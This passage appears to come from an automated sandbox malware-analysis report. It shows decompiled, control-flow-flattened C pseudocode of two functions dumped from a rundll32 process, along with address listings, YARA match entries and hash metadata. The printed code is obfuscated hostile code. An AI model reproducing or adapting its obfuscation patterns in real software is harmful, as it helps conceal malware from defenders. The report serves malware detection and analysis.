				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				intOrPtr _t372;
				void* _t379;
				signed int _t381;
				intOrPtr _t385;
				intOrPtr _t393;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				void* _t402;
				void* _t428;
				intOrPtr* _t437;
				void* _t440;
				intOrPtr _t444;
				signed int* _t446;
				void* _t448;

				_push(_a12);
				_push(_a8);
				_v12 = __edx;
				_push(_a4);
				_push(__edx);
				E02002550(__edx);
				_v164 = 0xccf8;
				_t446 =  &(( &_v168)[5]);
				_t444 = 0;
				_t440 = 0x5b8b322;
				_t393 = 0;
				_t395 = 0x39;
				_v164 = _v164 * 0x47;
				_v164 = _v164 * 0x3b;
				_v164 = _v164 + 0xffffb5ce;
				_v164 = _v164 ^ 0x0d199a53;
				_v48 = 0x6ac5;
				_v48 = _v48 ^ 0x000067e6;
				_v120 = 0xab9;
				_v120 = _v120 + 0xffffc5bb;
				_v120 = _v120 >> 0xb;
				_v120 = _v120 * 0x34;
				_v120 = _v120 ^ 0x067fd26a;
				_v64 = 0x3f6b;
				_v64 = _v64 | 0x8301b69e;
				_v64 = _v64 ^ 0xf453b1d5;
				_v64 = _v64 ^ 0x7752766c;
				_v136 = 0x6672;
				_v136 = _v136 / _t395;
				_v136 = _v136 >> 2;
				_v136 = _v136 + 0x3c5d;
				_v136 = _v136 ^ 0x00000609;
				_v72 = 0x83af;
				_v72 = _v72 + 0xffff692b;
				_v72 = _v72 << 0xe;
				_v72 = _v72 ^ 0xfb36aaa0;
				_v144 = 0x1094;
				_v144 = _v144 << 3;
				_v144 = _v144 >> 1;
				_v144 = _v144 << 2;
				_v144 = _v144 ^ 0x000104fb;
				_v52 = 0xbbd9;
				_v52 = _v52 >> 0xa;
				_v52 = _v52 ^ 0x000007b3;
				_v56 = 0xb390;
				_v56 = _v56 | 0xd4330ee7;
				_v56 = _v56 ^ 0xd433f5ab;
				_v80 = 0x1d14;
				_v80 = _v80 ^ 0xe2529727;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0x94518475;
				_v152 = 0x78c0;
				_v152 = _v152 + 0xffffa07a;
				_v152 = _v152 | 0x12864170;
				_v152 = _v152 + 0xffff96fb;
				_v152 = _v152 ^ 0x12858604;
				_v88 = 0x362c;
				_v88 = _v88 + 0x273d;
				_v88 = _v88 | 0x7b30ce6c;
				_v88 = _v88 ^ 0x7b308180;
				_v160 = 0x1107;
				_t396 = 0xd;
				_v160 = _v160 / _t396;
				_v160 = _v160 + 0xaf20;
				_v160 = _v160 << 0xe;
				_v160 = _v160 ^ 0x2c1bf631;
				_v28 = 0x16fd;
				_v28 = _v28 ^ 0xc6d3337a;
				_v28 = _v28 ^ 0xc6d3649c;
				_v128 = 0xb310;
				_v128 = _v128 + 0x60af;
				_t397 = 0x11;
				_v128 = _v128 * 0x17;
				_v128 = _v128 >> 0x10;
				_v128 = _v128 ^ 0x00003f03;
				_v108 = 0x969;
				_v108 = _v108 + 0x5b76;
				_v108 = _v108 | 0x469c96ef;
				_v108 = _v108 + 0xd995;
				_v108 = _v108 ^ 0x469dfd2d;
				_v24 = 0xa535;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x014a08df;
				_v116 = 0x2d09;
				_v116 = _v116 / _t397;
				_v116 = _v116 << 0xf;
				_t398 = 0x5a;
				_v116 = _v116 * 0x1d;
				_v116 = _v116 ^ 0x266728a5;
				_v156 = 0xc20b;
				_v156 = _v156 + 0xffff4ceb;
				_v156 = _v156 + 0x3710;
				_v156 = _v156 >> 6;
				_v156 = _v156 ^ 0x000023ae;
				_v60 = 0x9b8;
				_v60 = _v60 + 0xbf87;
				_v60 = _v60 ^ 0x000089a9;
				_v132 = 0x3af8;
				_v132 = _v132 / _t398;
				_v132 = _v132 ^ 0xca87d414;
				_v132 = _v132 + 0xffff6282;
				_v132 = _v132 ^ 0xca8759f3;
				_v92 = 0x2786;
				_v92 = _v92 + 0x26b3;
				_v92 = _v92 | 0x1d28531e;
				_v92 = _v92 ^ 0x1d28279a;
				_v140 = 0x492b;
				_v140 = _v140 + 0xffff62ea;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 << 3;
				_v140 = _v140 ^ 0x001f936e;
				_v40 = 0x294b;
				_v40 = _v40 | 0x90a98536;
				_v40 = _v40 ^ 0x90a99c6f;
				_v124 = 0x1400;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xffffb6e1;
				_v124 = _v124 >> 0xa;
				_v124 = _v124 ^ 0x00026da1;
				_v148 = 0x1dcc;
				_v148 = _v148 + 0xffff7172;
				_v148 = _v148 ^ 0x59a54da9;
				_t399 = 0x3a;
				_v148 = _v148 / _t399;
				_v148 = _v148 ^ 0x02de527e;
				_v96 = 0xc2c0;
				_t400 = 0x59;
				_v96 = _v96 / _t400;
				_v96 = _v96 | 0x601f9634;
				_v96 = _v96 ^ 0x601fa5fc;
				_v68 = 0x5993;
				_v68 = _v68 + 0x3c37;
				_t401 = 0x27;
				_v68 = _v68 * 0x42;
				_v68 = _v68 ^ 0x00269f78;
				_v100 = 0x35d8;
				_v100 = _v100 + 0xf370;
				_v100 = _v100 + 0x85ef;
				_v100 = _v100 ^ 0x0001fecf;
				_v36 = 0x96a8;
				_v36 = _v36 << 4;
				_v36 = _v36 ^ 0x00096afa;
				_v84 = 0x6657;
				_v84 = _v84 / _t401;
				_v84 = _v84 + 0x88b2;
				_v84 = _v84 ^ 0x0000efd0;
				_v44 = 0x5846;
				_v44 = _v44 ^ 0xc187cff1;
				_v44 = _v44 ^ 0xc187ccd9;
				_v112 = 0x4c1b;
				_v112 = _v112 + 0xffffc101;
				_v112 = _v112 ^ 0x97fe48a5;
				_v112 = _v112 + 0xffff20cb;
				_v112 = _v112 ^ 0x97fd2571;
				_v32 = 0x3b02;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00000761;
				_v168 = 0x7902;
				_v168 = _v168 >> 0x10;
				_v168 = _v168 >> 9;
				_v168 = _v168 ^ 0x00000001;
				_v76 = 0x42c9;
				_v76 = _v76 >> 0xc;
				_v76 = _v76 ^ 0xe5acdda9;
				_v76 = _v76 ^ 0xe5acddac;
				_t437 = _v16;
				while(1) {
					L1:
					_t372 = _v104;
					while(1) {
						L2:
						_t428 = 0x137be7af;
						while(1) {
							L3:
							_t402 = 0x1f61ce4d;
							while(1) {
								L4:
								_t448 = _t440 - _t402;
								if(_t448 > 0) {
									goto L19;
								}
								L5:
								if(_t448 == 0) {
									E01FFE48F(_v96, _v168, _v12, _v68, _v100, _t444);
									_t446 =  &(_t446[4]);
									L18:
									_t440 = 0x1e16564f;
									while(1) {
										L1:
										_t372 = _v104;
										goto L2;
									}
								} else {
									if(_t440 == 0x5b8b322) {
										_t440 = 0x1e3d7d53;
										continue;
									} else {
										if(_t440 == 0x6fb8319) {
											_t385 = E02000321(_a4, _v76, _v108, _v24,  *_t437);
											_t446 =  &(_t446[3]);
											_v20 = _t385;
											_t372 = _v104;
											_t428 = 0x137be7af;
											_t440 =  !=  ? 0x137be7af : 0x2332be2e;
											goto L3;
										} else {
											if(_t440 == _t428) {
												E020007A6(_t444, _v116, _v20,  &_v8, _v32, _t402, _v156, _v60, _v132, _v92);
												_t440 =  !=  ? 0x1f61ce4d : 0x2332be2e;
												_t372 = E01FF5AB8(_v140, _v40, _v124, _v148, _v20);
												_t446 =  &(_t446[0xb]);
												_t402 = 0x1f61ce4d;
												_t428 = 0x137be7af;
												goto L31;
											} else {
												if(_t440 == 0x1e16564f) {
													E01FFDE81(_v36, _t444, _v84);
													_t440 = 0x35ec3230;
													while(1) {
														L1:
														_t372 = _v104;
														goto L2;
													}
												} else {
													if(_t440 != 0x1e3d7d53) {
														L31:
														if(_t440 != 0x2c302295) {
															_t372 = _v104;
															continue;
														}
													} else {
														_push(_t402);
														_t372 = E01FF54FB(0x20000);
														_t393 = _t372;
														if(_t393 != 0) {
															_t440 = 0x26c6e589;
															while(1) {
																L1:
																_t372 = _v104;
																L2:
																_t428 = 0x137be7af;
																L3:
																_t402 = 0x1f61ce4d;
																while(1) {
																	L4:
																	_t448 = _t440 - _t402;
																	if(_t448 > 0) {
																		goto L19;
																	}
																	goto L5;
																}
																goto L19;
															}
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _t372;
								L33:
								L19:
								if(_t440 == 0x2332be2e) {
									_t437 = _t437 + 0x2c;
									if(_t437 >= _t372) {
										_t440 = 0x1e16564f;
										goto L31;
									} else {
										_t440 = 0x6fb8319;
										continue;
									}
								} else {
									if(_t440 == 0x26c6e589) {
										_push(_t402);
										_t444 = E01FF54FB(0x2000);
										_t440 =  !=  ? 0x2b10f021 : 0x35ec3230;
										goto L1;
									} else {
										_t372 = 0x2b10f021;
										if(_t440 == 0x2b10f021) {
											_t379 = E01FFEBC8(_t402, _t428, _v136, _t402, _v72, _t402, _t402,  &_v4, _v144, _t402, _v52, _t393, _v56, _v80, _v152,  &_v16, _v88, _v160, _v28, _a4);
											_t446 =  &(_t446[0x12]);
											if(_t379 == 0) {
												goto L18;
											} else {
												_t381 = E01FFA156();
												_t440 = 0x6fb8319;
												_t372 = _v16 * 0x2c + _t393;
												_v104 = _t372;
												_t437 =  >=  ? _t393 : (_t381 & 0x0000001f) * 0x2c + _t393;
												goto L2;
											}
											goto L33;
										} else {
											if(_t440 == 0x35ec3230) {
												return E01FFDE81(_v44, _t393, _v112);
											}
											goto L31;
										}
									}
								}
								goto L24;
							}
						}
					}
				}
			}

































































                                                                      0x01ffcaad
                                                                      0x01ffcab6
                                                                      0x01ffcabd
                                                                      0x01ffcac4
                                                                      0x01ffcacb
                                                                      0x01ffcacd
                                                                      0x01ffcad2
                                                                      0x01ffcada
                                                                      0x01ffcae4
                                                                      0x01ffcae6
                                                                      0x01ffcaeb
                                                                      0x01ffcaef
                                                                      0x01ffcaf0
                                                                      0x01ffcafb
                                                                      0x01ffcaff
                                                                      0x01ffcb07
                                                                      0x01ffcb0f
                                                                      0x01ffcb28
                                                                      0x01ffcb33
                                                                      0x01ffcb3b
                                                                      0x01ffcb43
                                                                      0x01ffcb4d
                                                                      0x01ffcb51
                                                                      0x01ffcb59
                                                                      0x01ffcb61
                                                                      0x01ffcb69
                                                                      0x01ffcb71
                                                                      0x01ffcb79
                                                                      0x01ffcb89
                                                                      0x01ffcb8d
                                                                      0x01ffcb92
                                                                      0x01ffcb9a
                                                                      0x01ffcba2
                                                                      0x01ffcbaa
                                                                      0x01ffcbb2
                                                                      0x01ffcbb7
                                                                      0x01ffcbbf
                                                                      0x01ffcbc7
                                                                      0x01ffcbcc
                                                                      0x01ffcbd0
                                                                      0x01ffcbd5
                                                                      0x01ffcbdd
                                                                      0x01ffcbe8
                                                                      0x01ffcbf0
                                                                      0x01ffcbfb
                                                                      0x01ffcc06
                                                                      0x01ffcc11
                                                                      0x01ffcc1c
                                                                      0x01ffcc24
                                                                      0x01ffcc2c
                                                                      0x01ffcc31
                                                                      0x01ffcc39
                                                                      0x01ffcc41
                                                                      0x01ffcc49
                                                                      0x01ffcc51
                                                                      0x01ffcc59
                                                                      0x01ffcc61
                                                                      0x01ffcc69
                                                                      0x01ffcc71
                                                                      0x01ffcc79
                                                                      0x01ffcc81
                                                                      0x01ffcc8d
                                                                      0x01ffcc90
                                                                      0x01ffcc96
                                                                      0x01ffcc9e
                                                                      0x01ffcca3
                                                                      0x01ffccab
                                                                      0x01ffccb6
                                                                      0x01ffccc1
                                                                      0x01ffcccc
                                                                      0x01ffccd4
                                                                      0x01ffcce3
                                                                      0x01ffcce6
                                                                      0x01ffccea
                                                                      0x01ffccef
                                                                      0x01ffccf7
                                                                      0x01ffccff
                                                                      0x01ffcd07
                                                                      0x01ffcd0f
                                                                      0x01ffcd17
                                                                      0x01ffcd1f
                                                                      0x01ffcd2a
                                                                      0x01ffcd32
                                                                      0x01ffcd3d
                                                                      0x01ffcd4d
                                                                      0x01ffcd51
                                                                      0x01ffcd5b
                                                                      0x01ffcd5e
                                                                      0x01ffcd62
                                                                      0x01ffcd6a
                                                                      0x01ffcd72
                                                                      0x01ffcd7a
                                                                      0x01ffcd82
                                                                      0x01ffcd87
                                                                      0x01ffcd8f
                                                                      0x01ffcd9a
                                                                      0x01ffcda5
                                                                      0x01ffcdb0
                                                                      0x01ffcdc0
                                                                      0x01ffcdc4
                                                                      0x01ffcdcc
                                                                      0x01ffcdd4
                                                                      0x01ffcddc
                                                                      0x01ffcde4
                                                                      0x01ffcdec
                                                                      0x01ffcdf4
                                                                      0x01ffcdfc
                                                                      0x01ffce04
                                                                      0x01ffce0c
                                                                      0x01ffce11
                                                                      0x01ffce16
                                                                      0x01ffce1e
                                                                      0x01ffce29
                                                                      0x01ffce34
                                                                      0x01ffce3f
                                                                      0x01ffce47
                                                                      0x01ffce4c
                                                                      0x01ffce54
                                                                      0x01ffce59
                                                                      0x01ffce61
                                                                      0x01ffce69
                                                                      0x01ffce71
                                                                      0x01ffce7d
                                                                      0x01ffce82
                                                                      0x01ffce86
                                                                      0x01ffce90
                                                                      0x01ffce9c
                                                                      0x01ffcea1
                                                                      0x01ffcea7
                                                                      0x01ffceaf
                                                                      0x01ffceb7
                                                                      0x01ffcebf
                                                                      0x01ffcecc
                                                                      0x01ffcecd
                                                                      0x01ffced1
                                                                      0x01ffced9
                                                                      0x01ffcee1
                                                                      0x01ffcee9
                                                                      0x01ffcef1
                                                                      0x01ffcef9
                                                                      0x01ffcf04
                                                                      0x01ffcf0c
                                                                      0x01ffcf17
                                                                      0x01ffcf25
                                                                      0x01ffcf29
                                                                      0x01ffcf31
                                                                      0x01ffcf39
                                                                      0x01ffcf44
                                                                      0x01ffcf4f
                                                                      0x01ffcf5a
                                                                      0x01ffcf62
                                                                      0x01ffcf6a
                                                                      0x01ffcf72
                                                                      0x01ffcf7a
                                                                      0x01ffcf82
                                                                      0x01ffcf8d
                                                                      0x01ffcf95
                                                                      0x01ffcfa0
                                                                      0x01ffcfa8
                                                                      0x01ffcfad
                                                                      0x01ffcfba
                                                                      0x01ffcfbf
                                                                      0x01ffcfc7
                                                                      0x01ffcfcc
                                                                      0x01ffcfd4
                                                                      0x01ffcfdc
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x01ffcfe7
                                                                      0x01ffcfe7
                                                                      0x01ffcfe7
                                                                      0x01ffcfec
                                                                      0x01ffcfec
                                                                      0x01ffcfec
                                                                      0x01ffcff1
                                                                      0x01ffcff1
                                                                      0x01ffcff1
                                                                      0x01ffcff3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffcff9
                                                                      0x01ffcff9
                                                                      0x01ffd14a
                                                                      0x01ffd14f
                                                                      0x01ffd152
                                                                      0x01ffd152
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x00000000
                                                                      0x01ffcfe3
                                                                      0x01ffcfff
                                                                      0x01ffd005
                                                                      0x01ffd128
                                                                      0x00000000
                                                                      0x01ffd00b
                                                                      0x01ffd011
                                                                      0x01ffd101
                                                                      0x01ffd106
                                                                      0x01ffd109
                                                                      0x01ffd117
                                                                      0x01ffd11b
                                                                      0x01ffd120
                                                                      0x00000000
                                                                      0x01ffd017
                                                                      0x01ffd019
                                                                      0x01ffd0a4
                                                                      0x01ffd0cb
                                                                      0x01ffd0d2
                                                                      0x01ffd0d7
                                                                      0x01ffd0da
                                                                      0x01ffd0df
                                                                      0x00000000
                                                                      0x01ffd01b
                                                                      0x01ffd021
                                                                      0x01ffd064
                                                                      0x01ffd06a
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x00000000
                                                                      0x01ffcfe3
                                                                      0x01ffd023
                                                                      0x01ffd029
                                                                      0x01ffd278
                                                                      0x01ffd27e
                                                                      0x01ffd284
                                                                      0x00000000
                                                                      0x01ffd284
                                                                      0x01ffd02f
                                                                      0x01ffd03f
                                                                      0x01ffd040
                                                                      0x01ffd045
                                                                      0x01ffd04a
                                                                      0x01ffd050
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x01ffcfe3
                                                                      0x01ffcfe7
                                                                      0x01ffcfe7
                                                                      0x01ffcfec
                                                                      0x01ffcfec
                                                                      0x01ffcff1
                                                                      0x01ffcff1
                                                                      0x01ffcff1
                                                                      0x01ffcff3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffcff3
                                                                      0x00000000
                                                                      0x01ffcff1
                                                                      0x01ffcfe3
                                                                      0x01ffd04a
                                                                      0x01ffd029
                                                                      0x01ffd021
                                                                      0x01ffd019
                                                                      0x01ffd011
                                                                      0x01ffd005
                                                                      0x01ffd1a6
                                                                      0x01ffd1a6
                                                                      0x00000000
                                                                      0x01ffd15c
                                                                      0x01ffd162
                                                                      0x01ffd262
                                                                      0x01ffd267
                                                                      0x01ffd273
                                                                      0x00000000
                                                                      0x01ffd269
                                                                      0x01ffd269
                                                                      0x00000000
                                                                      0x01ffd269
                                                                      0x01ffd168
                                                                      0x01ffd16e
                                                                      0x01ffd245
                                                                      0x01ffd24b
                                                                      0x01ffd25a
                                                                      0x00000000
                                                                      0x01ffd174
                                                                      0x01ffd174
                                                                      0x01ffd17b
                                                                      0x01ffd1fa
                                                                      0x01ffd1ff
                                                                      0x01ffd204
                                                                      0x00000000
                                                                      0x01ffd20a
                                                                      0x01ffd20e
                                                                      0x01ffd216
                                                                      0x01ffd228
                                                                      0x01ffd22c
                                                                      0x01ffd230
                                                                      0x00000000
                                                                      0x01ffd230
                                                                      0x00000000
                                                                      0x01ffd17d
                                                                      0x01ffd183
                                                                      0x00000000
                                                                      0x01ffd19b
                                                                      0x00000000
                                                                      0x01ffd183
                                                                      0x01ffd17b
                                                                      0x01ffd16e
                                                                      0x00000000
                                                                      0x01ffd162
                                                                      0x01ffcff1
                                                                      0x01ffcfec
                                                                      0x01ffcfe7

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -$+I$025$025$025$7<$FX$K)$RESCDIR$Wf$]<$lvRw$v[
                                                                      • API String ID: 0-3541609021
                                                                      • Opcode ID: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
                                                                      • Instruction ID: 21fb2faff7e0b75154ef0bf57ae101749b3859b981cfddf8315926af69df715b
                                                                      • Opcode Fuzzy Hash: c0770792cf82ae2b9e4ac636a34dcb648dc708d056a1601b2e7f761c4e2546bd
                                                                      • Instruction Fuzzy Hash: 701235725083819FE364CF69C989A4BFBE1BBC4758F10891DF2D996260C7B68949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023C017, Relevance: 16.6, Strings: 13, Instructions: 375COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -$+I$025$025$025$7<$FX$K)$RESCDIR$Wf$]<$lvRw$v[
                                                                      • API String ID: 0-3541609021
                                                                      • Opcode ID: 4fd5ab3d9a626b7ad5c676ebc6d3fe79e98380c16587f6164649b078393db6c6
                                                                      • Instruction ID: 2475ef4464c64854fd8201d03c48903bacdb1b09309280780212bf6200665734
                                                                      • Opcode Fuzzy Hash: 4fd5ab3d9a626b7ad5c676ebc6d3fe79e98380c16587f6164649b078393db6c6
                                                                      • Instruction Fuzzy Hash: ED1265B25183819FE368CF25C98AA4BFBE1BBC4748F10891CF5D996260C7B58958CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200BBF1, Relevance: 16.5, Strings: 13, Instructions: 269COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 78%
                                                                      			E0200BBF1(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _t270;
				void* _t271;
				intOrPtr* _t272;
				intOrPtr* _t275;
				intOrPtr _t276;
				intOrPtr _t278;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				void* _t318;
				intOrPtr* _t326;
				void* _t327;
				void* _t330;
				signed int* _t331;

				_t331 =  &_v96;
				_v36 = 0x7971;
				_v36 = _v36 >> 4;
				_v36 = _v36 >> 3;
				_v36 = _v36 ^ 0x0000182f;
				_v40 = 0xfd3e;
				_v40 = _v40 ^ 0x584e228f;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x0000cb4e;
				_v60 = 0xc7d1;
				_v60 = _v60 * 0x1a;
				_t330 = __edx;
				_v60 = _v60 ^ 0xe7356e21;
				_v60 = _v60 ^ 0xe721078e;
				_t278 = __ecx;
				_v12 = 0x8b7c;
				_t326 = 0;
				_t327 = 0xc32a3cb;
				_t280 = 0x76;
				_v12 = _v12 / _t280;
				_v12 = _v12 ^ 0x0000029d;
				_v64 = 0x73a3;
				_v64 = _v64 | 0x4efcdde2;
				_v64 = _v64 ^ 0xed66e3eb;
				_v64 = _v64 ^ 0xa39a41bb;
				_v16 = 0x4227;
				_t281 = 0x6d;
				_v16 = _v16 / _t281;
				_v16 = _v16 ^ 0x00001ea2;
				_v72 = 0x8c44;
				_v72 = _v72 << 1;
				_v72 = _v72 >> 9;
				_v72 = _v72 + 0xffffe8d2;
				_v72 = _v72 ^ 0xffffd00c;
				_v52 = 0xbd45;
				_v52 = _v52 | 0x9852b62d;
				_v52 = _v52 ^ 0xe9b55024;
				_v52 = _v52 ^ 0x71e7e0db;
				_v56 = 0x6ad6;
				_v56 = _v56 | 0xcbfebfcb;
				_t282 = 0x29;
				_v56 = _v56 / _t282;
				_v56 = _v56 ^ 0x04f9ee03;
				_v76 = 0x6ec;
				_v76 = _v76 + 0xffffce11;
				_v76 = _v76 + 0xffff084a;
				_v76 = _v76 + 0xffff2b6a;
				_v76 = _v76 ^ 0xfffe3623;
				_v44 = 0x29d6;
				_v44 = _v44 << 1;
				_t283 = 0x5a;
				_v44 = _v44 / _t283;
				_v44 = _v44 ^ 0x00000afa;
				_v48 = 0xe792;
				_v48 = _v48 + 0x94ab;
				_t284 = 0x2e;
				_v48 = _v48 / _t284;
				_v48 = _v48 ^ 0x000072c7;
				_v4 = 0xd512;
				_v4 = _v4 + 0xffff3306;
				_v4 = _v4 ^ 0x00006e5d;
				_v8 = 0x264b;
				_v8 = _v8 + 0xffff8ff4;
				_v8 = _v8 ^ 0xffff8e36;
				_v80 = 0x7210;
				_v80 = _v80 ^ 0x6afff0fe;
				_t285 = 0x11;
				_v80 = _v80 / _t285;
				_v80 = _v80 << 6;
				_v80 = _v80 ^ 0x92d08612;
				_v84 = 0x33aa;
				_v84 = _v84 ^ 0x3f3ff109;
				_v84 = _v84 + 0xffff35d7;
				_t286 = 0x2f;
				_v84 = _v84 / _t286;
				_v84 = _v84 ^ 0x015805a3;
				_v88 = 0x96ab;
				_t287 = 0x47;
				_v88 = _v88 * 0x24;
				_v88 = _v88 * 0x4e;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3a51b47d;
				_v92 = 0x8813;
				_v92 = _v92 | 0x160d8541;
				_v92 = _v92 + 0xffff816c;
				_v92 = _v92 * 0xf;
				_v92 = _v92 ^ 0x4ac3c30b;
				_v68 = 0x7d5a;
				_v68 = _v68 + 0xa00e;
				_v68 = _v68 ^ 0xd0cc0e09;
				_v68 = _v68 ^ 0xd0cd7390;
				_v20 = 0x6856;
				_v20 = _v20 | 0xcedc98a4;
				_v20 = _v20 ^ 0xcedcfbdf;
				_v24 = 0xae99;
				_v24 = _v24 >> 8;
				_v24 = _v24 ^ 0x0000275a;
				_v96 = 0xb43a;
				_v96 = _v96 * 0x19;
				_v96 = _v96 / _t287;
				_t288 = 3;
				_v96 = _v96 * 0x17;
				_v96 = _v96 ^ 0x0005aff4;
				_v28 = 0x55f9;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0x6ee3;
				_v28 = _v28 ^ 0x0000aff9;
				_v32 = 0x362c;
				_v32 = _v32 / _t288;
				_v32 = _v32 << 5;
				_v32 = _v32 ^ 0x00022d08;
				while(1) {
					L1:
					while(1) {
						L2:
						_t289 = 0x23245655;
						do {
							L3:
							while(_t327 != 0xc32a3cb) {
								if(_t327 == 0xd077af0) {
									return E01FFDE81(_v28, _t326, _v32);
								}
								if(_t327 == 0xf6ecb09) {
									_t270 = E01FF3B5C( *((intOrPtr*)(_t326 + 8)), _v4, _v8);
									_t331 =  &(_t331[1]);
									 *((intOrPtr*)(_t326 + 0x18)) = _t270;
									__eflags = _t270;
									_t289 = 0x23245655;
									_t271 = 0x24e45cbd;
									_t327 =  !=  ? 0x23245655 : 0x31f83ea5;
									continue;
								}
								if(_t327 == 0x20f8708a) {
									_push(_t289);
									_t272 = E01FF5B7D(_v60, _t330, __eflags, _v12, _v64, _v16);
									_t331 =  &(_t331[4]);
									 *((intOrPtr*)(_t326 + 8)) = _t272;
									__eflags = _t272;
									if(__eflags == 0) {
										L11:
										_t327 = 0xd077af0;
										while(1) {
											L1:
											L2:
											_t289 = 0x23245655;
											goto L3;
										}
									}
									E01FF5696(_v72,  *((intOrPtr*)(_t326 + 8)), _v52, _v56,  *((intOrPtr*)(_t326 + 8)), _v76);
									_push(_v48);
									E02001A48( *((intOrPtr*)(_t326 + 8)));
									_t331 =  &(_t331[5]);
									_t327 = 0xf6ecb09;
									while(1) {
										L1:
										goto L2;
									}
								}
								if(_t327 == _t289) {
									_push(E01FFF369);
									_push(_v92);
									_push(_t289);
									_push(_v88);
									_push(_v84);
									_t275 = E01FF903E(_t326, _v80);
									_t331 = _t331 - 0xc + 0x20;
									 *((intOrPtr*)(_t326 + 0x28)) = _t275;
									__eflags = _t275;
									_t271 = 0x24e45cbd;
									_t327 =  !=  ? 0x24e45cbd : 0x31f83ea5;
									goto L2;
								}
								if(_t327 == _t271) {
									 *((intOrPtr*)(_t326 + 0x44)) = _t278;
									_t276 =  *0x2011084;
									 *_t326 = _t276;
									 *0x2011084 = _t326;
									return _t276;
								}
								if(_t327 != 0x31f83ea5) {
									goto L19;
								}
								E0200A8BF(_v68, _v20, _v24, _v96,  *((intOrPtr*)(_t326 + 8)));
								_t331 =  &(_t331[3]);
								goto L11;
							}
							_push(_t289);
							_t318 = 0x50;
							_t326 = E01FF54FB(_t318);
							__eflags = _t326;
							if(__eflags == 0) {
								_t327 = 0xddc842e;
								_t289 = 0x23245655;
								goto L19;
							}
							_t327 = 0x20f8708a;
							goto L1;
							L19:
							__eflags = _t327 - 0xddc842e;
						} while (__eflags != 0);
						return _t271;
					}
				}
			}
















































                                                                      0x0200bbf1
                                                                      0x0200bbf4
                                                                      0x0200bbfc
                                                                      0x0200bc01
                                                                      0x0200bc06
                                                                      0x0200bc0e
                                                                      0x0200bc16
                                                                      0x0200bc1e
                                                                      0x0200bc23
                                                                      0x0200bc2b
                                                                      0x0200bc3c
                                                                      0x0200bc40
                                                                      0x0200bc42
                                                                      0x0200bc4c
                                                                      0x0200bc54
                                                                      0x0200bc56
                                                                      0x0200bc5e
                                                                      0x0200bc64
                                                                      0x0200bc6b
                                                                      0x0200bc70
                                                                      0x0200bc76
                                                                      0x0200bc7e
                                                                      0x0200bc86
                                                                      0x0200bc8e
                                                                      0x0200bc96
                                                                      0x0200bc9e
                                                                      0x0200bcaa
                                                                      0x0200bcaf
                                                                      0x0200bcb5
                                                                      0x0200bcbd
                                                                      0x0200bcc5
                                                                      0x0200bcc9
                                                                      0x0200bcce
                                                                      0x0200bcd6
                                                                      0x0200bcde
                                                                      0x0200bce6
                                                                      0x0200bcee
                                                                      0x0200bcf6
                                                                      0x0200bcfe
                                                                      0x0200bd06
                                                                      0x0200bd12
                                                                      0x0200bd17
                                                                      0x0200bd1d
                                                                      0x0200bd25
                                                                      0x0200bd2d
                                                                      0x0200bd35
                                                                      0x0200bd3d
                                                                      0x0200bd45
                                                                      0x0200bd4d
                                                                      0x0200bd55
                                                                      0x0200bd5d
                                                                      0x0200bd62
                                                                      0x0200bd68
                                                                      0x0200bd70
                                                                      0x0200bd78
                                                                      0x0200bd84
                                                                      0x0200bd87
                                                                      0x0200bd8b
                                                                      0x0200bd95
                                                                      0x0200bd9d
